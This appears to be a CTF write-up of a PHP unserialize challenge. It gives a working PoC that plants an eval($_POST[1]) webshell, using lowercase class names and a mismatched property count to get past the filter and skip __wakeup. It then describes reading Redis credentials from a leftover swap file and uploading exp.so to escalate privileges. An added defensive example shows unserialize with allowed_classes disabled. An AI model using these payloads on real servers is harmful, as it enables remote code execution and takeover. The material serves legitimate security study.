This challenge also introduced quite a few new concepts.
<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
    }
    function __wakeup(){
        $this->code = "";
    }
}
class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);
    }
}else{
    highlight_file(__FILE__);
}
PoC:
<?php
// The class names are lowercase so that the serialized string never matches
// /"[BA]":/ in the challenge's filter. PHP resolves class names
// case-insensitively, so on the server side these still become A and B.
class a{
    public $code='eval($_POST[1]);';
}
class b{
    public $a;
}
$poc=new b();
$poc->a=new a();
echo serialize($poc);
?>
To bypass the regex, the class names are changed to lowercase (PHP class names are case-insensitive, so the objects still resolve to A and B when unserialized):
O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}
Then change the property count after b to any other value to bypass __wakeup: when the count does not match, unserialize skips __wakeup, but the object is still created and its __destruct still runs.
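The two bypasses above show why a regex over the raw serialized string is the wrong place to stop this. The following is an added example, not part of the challenge or the original writeup: it replays the writeup's payloads (constructed inline) against the challenge's regex check and against `unserialize()` with the `allowed_classes` option (PHP 7.0+), which refuses to instantiate any class and so leaves no `__wakeup`, `__call` or `__destruct` to trigger. For untrusted input, `json_decode()` is the better choice altogether; `allowed_classes => false` is the minimal fix when the serialized format cannot be changed.

```php
<?php
// Added example, not from the challenge or the writeup.
// Constructed payloads: the writeup's lowercase PoC, the same payload with a
// mismatched property count (the __wakeup bypass), and a harmless array.
$payloads = [
    'lowercase'   => 'O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}',
    'bad_count'   => 'O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}',
    'plain_array' => 'a:1:{s:3:"key";s:5:"value";}',
];

// The challenge's check: a regex over the raw string. Class names in PHP are
// case-insensitive, so "b" and "a" never hit the [BA] character class and the
// property-count test is never reached.
function regex_filter_allows(string $poc): bool {
    preg_match_all('/"[BA]":(.*?):/s', $poc, $ret);
    foreach ($ret[1] as $i) {
        if (intval($i) !== 1) {
            return false;
        }
    }
    return true;
}

// The defensive alternative: refuse every class. Any O:... token becomes a
// __PHP_Incomplete_Class, which carries no magic methods, so nothing executes.
function safe_unserialize(string $data) {
    return unserialize($data, ['allowed_classes' => false]);
}

foreach ($payloads as $name => $p) {
    printf("%-12s regex allows: %s  ", $name, regex_filter_allows($p) ? 'yes' : 'no');
    $v = safe_unserialize($p);
    if ($v === false) {
        echo "safe_unserialize rejected it (malformed input)\n";
    } elseif ($v instanceof __PHP_Incomplete_Class) {
        echo "object neutralised as __PHP_Incomplete_Class\n";
    } else {
        echo "plain data: " . json_encode($v) . "\n";
    }
}
```

Run with `php example.php`: the regex lets all three payloads through, while `safe_unserialize()` turns the object payload into an inert `__PHP_Incomplete_Class`, rejects the bad-count variant as malformed, and returns the array unchanged.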
After connecting with AntSword, the permissions turned out to be insufficient.
There is a config.php.swp file left in the web root; recovering it with vim (vim -r) gives:
<?php
define("DB_HOST","localhost");
define("DB_USERNAME","root");
define("DB_PASSWOrd","");
define("DB_DATABASE","test");
define("REDIS_PASS","you_cannot_guess_it");
The Redis password is given right there.
First upload the exp.so file,
then use the AntSword plugin to escalate privileges.